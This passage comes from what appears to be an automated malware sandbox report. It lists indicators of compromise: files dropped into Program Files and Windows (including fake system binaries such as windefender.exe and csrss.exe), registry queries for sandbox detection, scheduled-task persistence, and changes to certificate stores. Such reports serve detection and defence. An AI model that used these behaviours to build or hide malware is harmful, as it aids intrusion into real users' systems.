vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-C0UFK.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files\M7PPVTFT73\M7PPVTFT7.exe.config tapinstall.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp -
Drops file in Windows directory 16 IoCs
Processes:
multitimer.exemultitimer.exesvchost.exeDrvInst.execsrss.exeDrvInst.exeWerFault.exeapp.exetapinstall.exeMicrosoftEdge.exedescription ioc process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\rss app.exe File created C:\Windows\rss\csrss.exe app.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5780 2000 WerFault.exe safebits.exe 1856 3296 WerFault.exe 5951.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeDrvInst.exetapinstall.exeDrvInst.exe5EE0.exesvchost.exeseed.exetapinstall.exe4DB7.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5EE0.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4DB7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
37FA.exe5.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 37FA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 37FA.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4816 schtasks.exe 3396 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4360 timeout.exe 1424 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4752 taskkill.exe 4716 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors MicrosoftEdge.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exemask_svc.exe6CFB.exenetsh.exeDrvInst.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs 6CFB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-162 = "Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 6CFB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates 6CFB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
